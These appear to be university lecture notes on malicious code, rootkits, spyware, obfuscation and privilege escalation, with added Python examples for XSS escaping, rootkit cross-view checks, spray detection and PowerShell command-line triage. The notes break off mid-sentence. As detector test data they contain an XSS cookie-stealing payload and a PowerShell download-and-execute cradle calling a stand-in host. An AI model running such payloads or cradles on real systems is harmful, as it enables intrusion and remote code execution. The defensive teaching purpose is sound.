Cse Unit-4

Malicious code refers to harmful software that can damage computer systems and networks, including viruses, worms, and Trojans. It is often used by cybercriminals to gain unauthorized access, steal data, and execute cyber-attacks. Protection against such threats involves using antivirus software, being cautious with links and attachments, and employing various security measures to detect and mitigate risks.

UNIT-4

What Is Malicious Code?


• Malicious code is any type of code that causes harm to a computer system or
network. This includes viruses, worms, Trojan horses, ransomware, logic
bombs, and other malicious programs.
• Malicious code is not limited to compiled programs: scripts, document
macros, browser-side JavaScript, and shell commands all count when they are
written to manipulate a computer, and they commonly lead to unauthorized
access to a system.
• Attackers write such scripts to damage, alter, or breach a network, either by
creating new weaknesses (a backdoor, a weakened configuration) or by
exploiting vulnerabilities that already exist.
• Malicious code is used to craft numerous forms of malware, which can steal
data, gain unauthorized access to sensitive information, and carry out
multiple kinds of cyber-attack.
• Such attacks are easier to carry out than they once were because malicious
scripts can be re-used and automated, which allows widespread and faster
cyber-attacks to take place.
Types of malicious code

Many malicious code types can harm your computer by finding entry points that
lead to your precious data. Among the ever-growing list, here are some common
culprits.

Viruses

Viruses are self-replicating malicious code that attaches itself to a host, such as
an executable, a boot sector, or a macro-enabled document, and runs when that
host runs. The infected files travel via documents and other file downloads,
allowing the virus to infiltrate your device. Once the virus executes, it copies
itself into further hosts and can spread through the system and across connected
networks.

Worms

Worms are also self-replicating and self-spreading code like viruses, but they need
neither a host file nor a user to run them. Once a worm has arrived on a device,
typically by exploiting a network-reachable service or via a removable drive, it
can execute and propagate entirely on its own, without any assistance from a
user-run program.

Trojans

Trojans are decoy files that carry malicious code payloads and run only when a
user opens the file or program. These threats cannot self-replicate or spread
autonomously. However, their malicious payload could contain viruses, worms, or
any other code.

Cross-site scripting (XSS)

Cross-site scripting interferes with the user’s web browsing by injecting
attacker-controlled script into pages served by a web application the user trusts,
so that the script runs in the victim's browser with that site's privileges. It is
often used to alter web content, steal session cookies and other confidential
information, or serve an infection to the user’s device itself.
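The following is an added example in Python (not part of these notes) showing the injection next to its fix. The page template and the query and link parameters are hypothetical; the point it makes is that text content needs HTML escaping, while a URL attribute additionally needs its scheme allow-listed, because a `javascript:` link contains no HTML metacharacters for an escaper to neutralise.

```python
from html import escape
from urllib.parse import urlsplit

# Hypothetical server-side template: the search query and a share link are
# reflected straight into the page that is sent back to the browser.
RESULTS_TEMPLATE = '<p>Results for: {query}</p><a href="{link}">Share this search</a>'


def render_unsafe(query: str, link: str) -> str:
    """Vulnerable: user input is pasted into HTML unchanged (reflected XSS)."""
    return RESULTS_TEMPLATE.format(query=query, link=link)


def safe_href(url: str) -> str:
    """Escaping alone is not enough inside href: 'javascript:alert(1)' has no
    HTML metacharacters, so the URL scheme itself must be allow-listed."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return escape(url, quote=True)


def render_escaped(query: str, link: str) -> str:
    """Hardened: HTML-escape text content, and allow-list the URL scheme."""
    return RESULTS_TEMPLATE.format(query=escape(query, quote=True),
                                   link=safe_href(link))


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"
    print(render_unsafe(payload, "javascript:alert(1)"))   # script and link survive
    print(render_escaped(payload, "javascript:alert(1)"))  # inert text, link replaced by "#"
```

Escaping is context-specific: the same input needs different treatment in text, in an attribute, inside a `<script>` block, or in a URL, which is why template engines with automatic contextual escaping are preferred over hand-rolled calls like these.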

Backdoor attacks

Application backdoor access can be coded to give a cybercriminal remote access to
the compromised system. Aside from exposing sensitive data, such as private
company information, a backdoor gives an attacker the persistent foothold that
characterises an advanced persistent threat (APT).

Cybercriminals can then move laterally from their newly obtained access level,
wipe out a computer's data, or install spyware. These threats can reach a high
level: the U.S. Government Accountability Office has warned about the threat of
malicious code to national security.

Examples of malicious code attacks

Malicious code comes in many forms and has a long track record of attacks.
Among the instances of these attacks, here are a few of the most well-known:

Emotet trojan

First appearing in 2014 as a banking trojan, Emotet evolved into a malware
distribution service delivered by email spam laden with malicious attachments and
links. The attackers use phishing tactics such as urgent email subject lines (for
example "Payment Needed") to fool users into downloading and opening the
attachment.

Once on a device, Emotet has been known to run scripts that deliver additional
malware, install command and control (C&C) components for botnet recruitment,
and more. The threat took a short break in 2018 before returning, adding SMS
phishing to its delivery methods in the process.

Stuxnet worm

Discovered in 2010, the Stuxnet computer worm and its successors have targeted
national infrastructure. Its first documented attack hit Iranian nuclear facilities,
spreading via USB flash drives and destroying centrifuge equipment. Stuxnet itself
has since ceased, but its source code has been used to create similar highly
targeted attacks through 2018.

How to protect against malicious code attacks

For most malicious threats, antivirus software with automatic updates, malware
removal capabilities, and web-browsing security is the best defense. However,
preventing malicious code may not be possible with antivirus software on its own.
Antivirus typically prevents and removes viruses and other forms of malware, but
malware (malicious software) is only a subcategory of malicious code. The broader
category also includes website scripts that exploit browser or server
vulnerabilities to deliver malware, and a signature-based antivirus will not catch
every infection or action caused by such code.

While antivirus is still essential for proactive infection removal and defense, here
are some valuable ways to protect yourself:

• Install anti-scripting software, or use your browser's script-blocking
features, to prevent JavaScript and related code from running without your
authorization.
• Exercise caution with links and attachments. Any message containing URL
links or attachments, whether by email or text message, can be a vector for
malicious code.
• Activate your browser’s popup blocker to prevent scripts from serving
malicious content in unwanted browser windows.
• Avoid using admin-level accounts for daily use. Code that runs under a
standard user account cannot install drivers, modify system files, or create
system-wide persistence without a further privilege-escalation step.
• Utilize data backups to protect irreplaceable files and documents.
• Be wary of using any public data connection. USB connections are
generally overlooked but can easily harbor malicious code. Public Wi-Fi is
also a common threat that attackers can use to deliver malicious code.
• Use a properly configured firewall to block unauthorized connections. If
malicious code infiltrates your machine and connects outward to request
malware payloads, a firewall can help stop this. Be sure that your firewall is
configured to deny by default and to allow only expected, trusted
connections.
1. Privilege Escalation:

• Privilege escalation is a type of attack in which a malicious actor gains
higher-level access to a system or network than they are originally granted.
This could be either:
o Vertical Privilege Escalation: Gaining higher privileges, such as a
regular user becoming an administrator.
o Horizontal Privilege Escalation: Gaining access to the same level of
privilege but to other accounts or data.

Privilege escalation typically involves exploiting weaknesses in a system’s
configuration or vulnerabilities in software to increase access levels. For example,
a hacker might exploit a flaw in an operating system to elevate their access from a
standard user to an admin.

2. Obfuscation:

• Obfuscation in cybersecurity refers to techniques used to obscure or hide
the true purpose or nature of an action or data. This can be used both for
attacks (hiding malicious intent) and for defenses (hiding the inner workings of
security measures).

In the context of cyberattacks, obfuscation is often used to:

• Mask the presence of malicious code or malware, making it harder to
detect by traditional security measures.
• Hide the attacker’s actions, such as obfuscating the commands or scripts
used during an attack to avoid detection by monitoring systems or logging
mechanisms.

Examples of obfuscation techniques in cyberattacks include:

• Code obfuscation: Altering code to make it difficult for anyone reading the
code to understand its purpose, for example by renaming identifiers, encoding
strings, or packing the binary. This is common in malware to prevent
reverse engineering.
• Encryption and tunneling: Masking data being transferred to avoid
detection by security systems (e.g., encrypting command-and-control traffic,
tunneling it inside DNS or HTTPS, or hiding it in images with steganography).
• Obfuscating IP addresses or using tools like VPNs and proxies to hide the
attacker’s real location.

Combining Privilege Escalation and Obfuscation:

• In advanced attacks, privilege escalation may be paired with obfuscation to
make it harder for defenders to detect and respond to the attack.
• Once an attacker escalates their privileges, they may use obfuscation to hide
their tracks, making it more difficult for security tools to trace their actions.
• The goal is to maintain persistence and stealth, ensuring that the attacker
has continuous and undetected access to the compromised systems.

Defense Strategies:

• Detecting privilege escalation involves monitoring for unusual or
unauthorized attempts to gain higher privileges, auditing access logs, and
using techniques like least privilege (granting the minimum level of access
necessary).
• Obfuscation defenses include using anti-malware tools, performing code
review for security vulnerabilities, leveraging intrusion detection systems
(IDS), and employing behavioral analysis to detect abnormal activities that
might be hidden by obfuscation.

What is Virtual Machine Obfuscation?

The term is used in two related senses. In the strict sense (code
virtualization, as in commercial protectors such as VMProtect and Themida), the
program's instructions are translated into a custom bytecode that is executed by an
interpreter embedded in the binary; a disassembler then shows only the interpreter,
and an analyst must first reverse-engineer the invented instruction set. In the
looser sense used in these notes, it also covers malware that checks whether it is
running inside a hypervisor-based virtual machine or sandbox and changes its
behaviour there. Both aim to make the code's execution difficult to reverse-engineer
or monitor in a standard analysis environment, so that security researchers,
antivirus software, and automated detection systems cannot see the real behaviour.
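A miniature of the strict sense (and of the code-obfuscation item under Obfuscation above), added here as an example and not taken from the notes or from any real protector: a routine is compiled to bytecode for an invented stack machine, the bytecode is stored XOR-encrypted, and only the interpreter exists as ordinary code. Every opcode, the key, and the protected routine are assumptions made for the illustration.

```python
"""Code virtualization ("VM obfuscation") in miniature.

A protector compiles a routine into bytecode for a custom interpreter and ships
the interpreter plus the (encrypted) bytecode; a disassembler then shows only the
fetch-decode-execute loop. The instruction set, encoding, key and the protected
routine below are all invented for this example.
"""


# The routine being protected, in plain form. Kept here only so the reader can
# compare; a real protector strips it from the binary.
def reference_hash(data: bytes) -> int:
    h = 0
    for c in data:
        h = ((h * 31) ^ c) & 0xFFFF
    return h


TARGET = reference_hash(b"s3cret")   # constant baked into the bytecode

# Arbitrary opcode numbering chosen by the "protector".
PUSH, LOAD, STORE, LOADIN, INLEN, ADD, SUB, MUL, XOR, AND, EQ, JZ, JMP, HALT = range(14)

# Stack-machine program equivalent to  reference_hash(inp) == TARGET.
# slot 0 holds h, slot 1 holds the loop index i; offsets are in the comments.
PROGRAM = [
    PUSH, 0, STORE, 0,                  #  0: h = 0
    PUSH, 0, STORE, 1,                  #  4: i = 0
    LOAD, 1, INLEN, SUB, JZ, 37,        #  8: if i - len(inp) == 0: goto 37
    LOAD, 0, PUSH, 31, MUL,             # 14: h * 31
    LOAD, 1, LOADIN, XOR,               # 19: ... ^ inp[i]
    PUSH, 0xFFFF, AND, STORE, 0,        # 23: h = ... & 0xFFFF
    LOAD, 1, PUSH, 1, ADD, STORE, 1,    # 28: i += 1
    JMP, 8,                             # 35: loop
    LOAD, 0, PUSH, TARGET, EQ, HALT,    # 37: return h == TARGET
]

KEY = 0x5A5A
PROTECTED = [word ^ KEY for word in PROGRAM]   # what actually ships in the binary


def run_vm(code, inp: bytes) -> int:
    """The interpreter: the only logic a static disassembler sees."""
    stack, slots, pc = [], [0, 0], 0
    binops = {ADD: lambda a, b: a + b, SUB: lambda a, b: a - b,
              MUL: lambda a, b: a * b, XOR: lambda a, b: a ^ b,
              AND: lambda a, b: a & b, EQ: lambda a, b: int(a == b)}
    while True:
        op = code[pc]
        pc += 1
        if op == PUSH:
            stack.append(code[pc])
            pc += 1
        elif op == LOAD:
            stack.append(slots[code[pc]])
            pc += 1
        elif op == STORE:
            slots[code[pc]] = stack.pop()
            pc += 1
        elif op == LOADIN:                 # pop index, push inp[index]
            stack.append(inp[stack.pop()])
        elif op == INLEN:
            stack.append(len(inp))
        elif op in binops:
            b, a = stack.pop(), stack.pop()
            stack.append(binops[op](a, b))
        elif op == JZ:
            target = code[pc]
            pc += 1
            if stack.pop() == 0:
                pc = target
        elif op == JMP:
            pc = code[pc]
        elif op == HALT:
            return stack.pop()
        else:
            raise ValueError(f"bad opcode {op} at offset {pc - 1}")


def vm_check(password: bytes) -> bool:
    """Decrypt the bytecode at run time and execute it, as a packed binary would."""
    return run_vm([word ^ KEY for word in PROTECTED], password) == 1


if __name__ == "__main__":
    print(vm_check(b"s3cret"), vm_check(b"guess"))   # True False
```

Reversing this means recovering the opcode table and handler semantics from `run_vm` before the program can even be read; commercial protectors add many handlers per opcode, junk instructions, and a different encoding per build to make that step expensive.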

Applications in Cybersecurity (Both Attacks and Defense)

1. Malicious Use of VM Obfuscation (Attacker’s Perspective)

• Evading Detection:
o VM-aware malware is commonly used to evade detection during malware
analysis. Security analysts may examine suspicious code in a sandboxed
environment, but if the malware detects that it is being run in a virtual
machine, it may not activate or will only perform harmless actions, allowing
the sample to slip past the detection.
• Hiding Malware Behavior:
o Malicious actors may use virtualized (bytecode) code to keep the true nature
of their payload hidden from detection tools, which makes it harder for
security systems to analyze and understand the full scope of the attack.
• Advanced Persistent Threats (APT):
o Advanced groups may leverage these techniques to maintain a foothold in a
network while remaining undetected for long periods, as their malware can be
designed to behave quietly in virtualized environments, which are common in
enterprise systems.

2. Defensive Use of VM (Security Researchers’ Perspective)

While attackers use VM obfuscation to hide their activities, defenders can also
leverage virtual machines to isolate threats and prevent them from spreading to real
systems. Some defensive applications include:

• Sandboxing:
o Security professionals use virtual machines to isolate and analyze
potentially harmful programs or suspicious files. By running these in a
VM, analysts can observe the behavior of malware without risking the
security of the actual operating system.
• VM Detection and Anti-VM Techniques:
o Sandbox operators watch for the probes VM-aware malware makes, such as
CPUID queries, lookups of VMware or VirtualBox registry keys, checks for
guest-tool processes, and tight timing loops, and treat them as a signal in
their own right.
o They also harden the sandbox to look like bare metal: renaming guest-tool
processes, randomising MAC addresses and firmware strings, and adding
realistic user activity, so that the malware executes its real payload.
o Some anti-virus programs may specifically look for signs of VM-aware
malware and block or flag suspicious activities that occur in VM
environments.

Persistent Software Techniques

Persistent software techniques in cybersecurity refer to methods that ensure the
continued presence, resilience, and long-term effectiveness of security measures,
malware, or defensive mechanisms. These techniques are used by both attackers
and defenders to maintain access, prevent detection, and sustain operational
capabilities. Here are key areas where persistence plays a role:

1. Attackers’ Persistent Techniques (Advanced Persistent Threats - APTs)

Attackers use various persistence techniques to maintain long-term access to
compromised systems, including:

• Rootkits & Bootkits – Modify operating system components to remain
hidden and persist across reboots.
• Registry Manipulation – Modify Windows registry keys (for example the Run
and RunOnce keys) to launch malicious code at logon.
• Scheduled Tasks & Services – Create scheduled tasks or system services
that execute automatically.
• DLL Injection & Process Hollowing – Inject code into legitimate
processes for stealth; paired with an autostart entry, the injected code
survives reboots.
• Firmware & BIOS/UEFI Attacks – Modify firmware to survive OS
reinstallation.
• Backdoors & Remote Access Trojans (RATs) – Maintain a covert channel
for continued control.
• Living off the Land (LotL) Techniques – Abuse built-in system utilities
(like PowerShell, WMI) to avoid detection.
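Living-off-the-land tooling cannot simply be blocked, so detection works on what the tooling was asked to do. The block below is an added example, not from the notes: it decodes PowerShell's -EncodedCommand argument as an EDR would see it on the process command line, then scores the decoded script against a short indicator list. It also serves the obfuscated-commands point made under Obfuscation above. The command lines are constructed, and the indicator list and the flag abbreviations covered are assumptions.

```python
import base64
import re

# PowerShell accepts abbreviations of -EncodedCommand; the argument is base64 of
# the UTF-16LE script text. Only the common short forms are matched here.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Indicators (assumed list) applied to the raw command line plus decoded script.
INDICATORS = [
    ("download cradle", re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")),
    ("in-memory execution", re.compile(r"(?i)invoke-expression|\biex\b")),
    ("nested encoding", re.compile(r"(?i)frombase64string")),
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("policy bypass", re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass")),
]


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand,
    None if it does not, or a marker if the argument is not valid base64/UTF-16."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def analyze(cmdline: str) -> dict:
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons = [name for name, rx in INDICATORS if rx.search(text)]
    if decoded is not None:
        reasons.append("encoded command")
    return {"cmdline": cmdline, "decoded": decoded, "reasons": reasons}


def triage(cmdlines):
    """Keep only command lines that trip at least one indicator."""
    return [r for r in (analyze(c) for c in cmdlines) if r["reasons"]]


# Constructed samples of what an EDR records as process command lines.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + base64.b64encode(CRADLE.encode("utf-16le")).decode(),
    'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
    'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest '
    'http://example.test/x.ps1 -OutFile C:\\Users\\Public\\x.ps1"',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(hit["reasons"], "<-", (hit["decoded"] or hit["cmdline"])[:60])
```

In production the same logic runs on Windows event 4688 or Sysmon event 1 command lines and on PowerShell script-block logging (event 4104), which records the script text after every layer of decoding, so the base64 step above is only needed where script-block logging is off.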

2. Defensive Persistent Techniques

Defenders also use persistence techniques to ensure ongoing security and
resilience:

• Endpoint Detection & Response (EDR) Solutions – Continuously monitor
and analyze system behavior.
• Self-Healing Security Mechanisms – Automatically restore security
configurations and files.
• Memory Integrity & Kernel Protection – Prevent unauthorized code
execution at the OS level.
• Behavioral Anomaly Detection – Persistent monitoring of system behavior
for anomalies.
• Threat Hunting & Cyber Deception – Deploy honeypots and deception
techniques to lure attackers.
• Zero Trust Architecture – Persistent verification of users, devices, and
network activities.

3. Persistence in Secure Software Development

Developers implement persistence techniques to enhance the security of software
applications:

• Secure Code Practices – Implement secure coding standards to resist
persistent threats.
• Code Obfuscation & Anti-Tampering – Prevent reverse engineering and
modification.
• Software Updates & Patch Management – Ensure consistent updates to
mitigate vulnerabilities.
• Application Sandboxing – Isolate applications to prevent persistent
malware infections.

Rootkits

A rootkit is a type of malicious software (malware) designed to keep unauthorized
access to a computer system while remaining undetected. Rootkits allow attackers
to take control of a system, modify files, steal data, and bypass security measures,
typically by hiding the processes, files, and connections that other malware uses.

Types of Rootkits

Rootkits can be categorized based on their level of access and functionality:

1. Kernel-mode Rootkits – Operate at the operating system’s core (kernel
level), for example as a malicious driver, making them very difficult to detect
and remove.
2. User-mode Rootkits – Operate at the application level, intercepting API
calls and altering what user applications see.
3. Bootkit – Infects the bootloader, allowing it to execute before the operating
system loads.
4. Firmware Rootkits – Reside in firmware (such as BIOS or UEFI), making
them persistent even after reinstallation of the OS.
5. Hypervisor Rootkits – Load a thin hypervisor beneath the running operating
system, turning the OS into a guest that the rootkit can manipulate from
outside.
6. Memory Rootkits – Reside only in system RAM and leave no traces on the
hard drive, making them harder to detect but easier to clear with a reboot.

How Rootkits Work

• Exploit system vulnerabilities to gain privileged access.
• Modify system files, drivers, or registry entries.
• Hide processes, files, and network connections from security tools.
• Allow remote attackers to control the system.

Detection & Removal

Rootkits are hard to detect because they hide deep within the system. However,
detection methods include:

• Behavior analysis – Identifying unusual system behavior.


• Signature-based detection – Using antivirus and anti-rootkit tools.
• Memory forensics – Analyzing RAM for hidden processes.
• Boot-time scanning – Detecting rootkits before they activate.
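One way to implement the cross-view comparison, as an added example that is not from the notes: the process inventory is taken once through a (hooked) list API and once by probing PIDs directly, and a system-call table is checked against the legitimate kernel's address range. The snapshots, PIDs, and addresses are constructed.

```python
"""Cross-view rootkit detection over constructed snapshots (added example).

A rootkit hides by tampering with the *answer* to a query (the process list,
a directory listing, the system call table) rather than with the objects
themselves. Detectors such as RootkitRevealer therefore take the same
inventory two ways, through the normal API and through a lower-level path,
and report whatever differs.
"""

# Constructed ground truth the kernel holds: pid -> image name (PIDs are
# multiples of 4, as on Windows).
KERNEL_PROCESSES = {4: "System", 612: "services.exe", 788: "svchost.exe",
                    1340: "explorer.exe", 2212: "rk_dropper.exe", 2288: "chrome.exe"}


def api_process_list(hidden_names=()):
    """High-level view: what a (possibly hooked) enumeration API returns.
    A rootkit's hook simply drops the entries it wants to hide."""
    return {pid: name for pid, name in KERNEL_PROCESSES.items()
            if name not in hidden_names}


def pid_probe_list(max_pid=65536):
    """Low-level view: ask about each PID directly (OpenProcess-style probing);
    a hook on the *list* API never sees these calls."""
    return {pid: KERNEL_PROCESSES[pid] for pid in range(0, max_pid, 4)
            if pid in KERNEL_PROCESSES}


def cross_view_diff(high, low):
    """Objects present in only one view are the rootkit signal."""
    hidden = {pid: low[pid] for pid in low.keys() - high.keys()}
    phantom = {pid: high[pid] for pid in high.keys() - low.keys()}
    return hidden, phantom


# Second check: a kernel-mode rootkit that hooks the system call table redirects
# entries to its own code. Addresses and the module range are constructed.
NTOSKRNL = (0xFFFFF80001000000, 0xFFFFF80001800000)   # [start, end) of the kernel image
SSDT = {
    "NtQuerySystemInformation": 0xFFFFF80001234560,
    "NtQueryDirectoryFile":     0xFFFFF800012A1000,
    "NtOpenProcess":            0xFFFFF88004C10B20,   # points into an unknown module
}


def hooked_syscalls(table, legit_ranges):
    """Entries that point outside every legitimate kernel module are hooked."""
    return [name for name, addr in table.items()
            if not any(lo <= addr < hi for lo, hi in legit_ranges)]


if __name__ == "__main__":
    hidden, phantom = cross_view_diff(
        api_process_list(hidden_names={"rk_dropper.exe"}), pid_probe_list())
    print("hidden processes:", hidden, "phantoms:", phantom)
    print("hooked syscalls:", hooked_syscalls(SSDT, [NTOSKRNL]))
```

The same diff applies to files (directory listing versus raw NTFS parsing) and registry keys (API versus hive file), which is why the tools named below report "hidden from Windows API" rather than claiming to know what the object is.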

Removing rootkits is challenging and often requires:

• Specialized anti-rootkit tools (e.g., GMER, RootkitRevealer).
• Booting into a clean OS to delete infected files.
• Reinstalling the operating system or flashing firmware.

Spyware in Cybersecurity

Spyware is a type of malicious software (malware) designed to secretly monitor
and collect information from a device without the user's consent. It operates
stealthily, often running in the background to gather sensitive data such as
passwords, browsing habits, keystrokes, and personal information.

Types of Spyware

Spyware can be classified based on its purpose and behavior:

1. Keyloggers – Record every keystroke made by the user, capturing login
credentials, credit card numbers, and other sensitive data.
2. Adware – Tracks user activity to display targeted advertisements,
sometimes slowing down the system.
3. Trojans – Spyware disguised as legitimate software, often allowing hackers
to access and control infected devices remotely.
4. System Monitors – Record user activity, including websites visited, emails
sent, and applications used.
5. Tracking Cookies – Monitor web browsing activities to collect marketing
data, often used for advertising purposes.
6. Banking Trojans – Specifically designed to steal financial information such
as online banking credentials.

How Spyware Infects Devices

Spyware can be installed in various ways, including:

✔ Malicious Email Attachments – Clicking on infected links or downloading
malicious attachments.
✔ Free Software & Fake Updates – Bundled with freeware or cracked software.
✔ Compromised Websites – Exploiting browser vulnerabilities.
✔ Drive-by Downloads – Automatically installed when visiting infected
websites.
✔ Phishing Attacks – Trick users into installing spyware through fake messages.

Detection & Removal

✔ Anti-Spyware & Antivirus Software – Use tools like Malwarebytes, Windows
Defender, or Spybot Search & Destroy.
✔ Task Manager Check – Identify unknown processes running in the
background.
✔ Monitor Network Activity – Check for unusual data transmissions.
✔ Safe Mode Scans – Boot into Safe Mode and run a full system scan.
✔ Reset Browsers & OS – Remove suspicious extensions or, in severe cases,
reinstall the operating system.

Attacks Against Privileged User Accounts & Privilege Escalation

Privileged user accounts have higher access rights than regular accounts,
allowing them to manage critical systems, change security settings, and access
sensitive data. Cybercriminals target these accounts to gain unauthorized control
over a system.

1. Attacks Against Privileged User Accounts

These attacks focus on stealing credentials, bypassing security measures, and
misusing high-privilege access. Common attack methods include:

A. Credential Theft Attacks

Phishing – Deceiving users into revealing credentials via fake emails or websites.
Keylogging – Capturing keystrokes to steal usernames and passwords.
Credential Dumping – Extracting stored credentials from memory (for example
from the LSASS process) using tools like Mimikatz.
Brute Force – Repeatedly guessing passwords for one account until access is
granted.
Password Spraying – Trying one or two common passwords against many accounts,
which stays under per-account lockout thresholds.
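Detection logic for the last two items over constructed authentication log lines, added here as an example and not part of the notes. Grouping failures by source address rather than by account is what makes spraying visible; the log format, the thresholds, and the RFC 5737 documentation addresses are assumptions.

```python
"""Telling brute force from password spraying in authentication logs.

Brute force hammers one account; spraying tries one or two passwords against
many accounts from one source to stay under per-account lockout thresholds, so
it is only visible when failures are grouped by source address. The log format,
thresholds and addresses below are constructed for this example.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log: ISO timestamp, result, account, source IP.
SAMPLE_LOG = """\
2024-05-01T09:00:01Z FAIL alice 203.0.113.7
2024-05-01T09:00:03Z FAIL bob 203.0.113.7
2024-05-01T09:00:05Z FAIL carol 203.0.113.7
2024-05-01T09:00:07Z FAIL dave 203.0.113.7
2024-05-01T09:00:09Z FAIL erin 203.0.113.7
2024-05-01T09:00:11Z FAIL frank 203.0.113.7
2024-05-01T09:00:13Z SUCCESS erin 203.0.113.7
2024-05-01T09:10:00Z FAIL admin 198.51.100.9
2024-05-01T09:10:10Z FAIL admin 198.51.100.9
2024-05-01T09:10:20Z FAIL admin 198.51.100.9
2024-05-01T09:10:30Z FAIL admin 198.51.100.9
2024-05-01T09:10:40Z FAIL admin 198.51.100.9
2024-05-01T09:10:50Z FAIL admin 198.51.100.9
2024-05-01T09:20:00Z FAIL alice 192.0.2.5
2024-05-01T09:20:09Z SUCCESS alice 192.0.2.5
"""


def parse(log_text):
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, result, user, ip = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "result": result, "user": user, "ip": ip})
    return events


def detect(log_text, window_minutes=10, spray_users=5, brute_fails=5):
    """One pass per source IP; the thresholds are tuning knobs, not constants."""
    window = timedelta(minutes=window_minutes)
    by_ip = defaultdict(list)
    for e in parse(log_text):
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "FAIL"]

        # Spraying: many *distinct* accounts failing inside one sliding window,
        # and any success from the same source afterwards is the real alarm.
        for i, first in enumerate(fails):
            in_window = [e for e in fails[i:] if e["ts"] - first["ts"] <= window]
            users = {e["user"] for e in in_window}
            if len(users) >= spray_users:
                later_ok = sorted({e["user"] for e in evs
                                   if e["result"] == "SUCCESS" and e["ts"] >= first["ts"]})
                alerts.append({"type": "password_spray", "ip": ip,
                               "distinct_users": len(users), "later_success": later_ok})
                break

        # Brute force: many failures against the *same* account.
        for user, n in Counter(e["user"] for e in fails).items():
            if n >= brute_fails:
                alerts.append({"type": "brute_force", "ip": ip,
                               "user": user, "failures": n})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Real sprays are slower (one attempt per account per hour is common) and come from many addresses, so the window is usually hours and the grouping key is often the password-guess pattern or the client user-agent rather than a single IP.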

B. Exploiting Weak Authentication

Default Credentials – Many systems come with default admin passwords
that attackers exploit.
Weak Passwords – Easily guessable or reused passwords make attacks
easier.
Lack of Multi-Factor Authentication (MFA) – Without MFA, a stolen
password is enough for access.

C. Insider Threats

Disgruntled Employees – Current or former employees misusing privileged
access.
Social Engineering – Tricking employees into granting access.

D. Malware & Ransomware

Remote Access Trojans (RATs) – Attackers use RATs to take control of
admin accounts.
Rootkits – Hide malicious activities and allow attackers to operate
undetected.

2. Privilege Escalation Attacks

Once attackers gain access to a system, they attempt to increase their privileges to
take full control.

A. Types of Privilege Escalation

1. Vertical Privilege Escalation (Privilege Elevation) – A lower-privilege
user (or attacker) gains admin or root privileges.
2. Horizontal Privilege Escalation – An attacker moves between user
accounts at the same privilege level to access restricted data.

B. Common Privilege Escalation Techniques

• Exploiting Vulnerabilities – Attackers use OS and software flaws to
escalate privileges.
• Token Impersonation – Gaining access by hijacking authentication tokens.
• DLL Injection & Hijacking – Running malicious code by tricking the
system into loading a fake Dynamic Link Library (DLL).
• Scheduled Task Exploitation – Modifying system tasks to execute
malicious commands with elevated privileges.
• Kernel Exploits – Taking advantage of vulnerabilities in the operating
system kernel.

Token Kidnapping in Cybersecurity

Token Kidnapping is a type of privilege escalation attack where an attacker
hijacks a user's security token to execute processes with higher privileges. This
technique allows attackers to impersonate privileged users, such as administrators
or system accounts, to perform unauthorized actions.

1. Understanding Security Tokens

A security token in Windows is a kernel object attached to every process and
thread that records who the code is running as: the user's SID, group
memberships, privileges (such as SeDebugPrivilege or SeImpersonatePrivilege), and
integrity level. When a user logs on, the system creates a token, and every
access check and privilege check is made against the token of the calling
process or thread, which is what makes tokens such a valuable target.

Types of Tokens:

• Primary Token – Attached to every process at creation; it is the security
context the process normally runs under.
• Impersonation Token – Attached to a thread, allowing that thread to act on
behalf of another user temporarily (for example a server thread handling a
client's request).

2. How Token Kidnapping Works

Attack Steps:

1. Gain Initial Access – The attacker compromises a system using malware,
exploits, or credential theft.
2. Locate a Process Running with Higher Privileges – Common targets
include services running as SYSTEM or an administrator.
3. Hijack the Token – The attacker injects or manipulates an impersonation
token to act as a privileged user.
4. Execute Malicious Actions – The attacker gains administrative access to
install malware, disable security tools, or escalate privileges further.

3. Techniques Used in Token Kidnapping

• Impersonation Token Abuse – A process holding SeImpersonatePrivilege
(granted to many service accounts) can adopt the token of a more privileged
client that connects to it; the attacker arranges such a connection and then
impersonates SYSTEM.
• Token Duplication & Theft – Tools like Mimikatz or the Metasploit incognito
module enumerate tokens in accessible processes and duplicate them for
reuse.
• DLL Injection & Process Hollowing – Injecting code into a legitimate
high-privileged process so that it runs under that process's token.
• Scheduled Tasks Exploitation – Creating or modifying tasks that run under
SYSTEM privileges.

4. Real-World Example

In Windows XP and Server 2003, a vulnerability (published as "Token Kidnapping"
by Cesar Cerrudo and addressed in Microsoft bulletin MS09-012) allowed
low-privileged service accounts to hijack impersonation tokens from privileged
system services. Microsoft addressed this in later versions, but the underlying
pattern, abusing SeImpersonatePrivilege to capture a privileged token, continues
to be exploited on unpatched systems and reappears in later techniques.

Virtual Machine (VM) Detection in Cybersecurity

Virtual Machine Detection refers to techniques used to determine whether a
system is running in a virtualized environment such as VMware, VirtualBox, or
Hyper-V. This is often used by malware, anti-cheat software, and security tools
for various purposes.

1. Why Detect Virtual Machines?

A. Malware Perspective

Cybercriminals use VM detection to:

✔ Evade Detection – Malware avoids execution in VM environments used by
security researchers and sandboxes.
✔ Prevent Reverse Engineering – Attackers use VM detection to stop
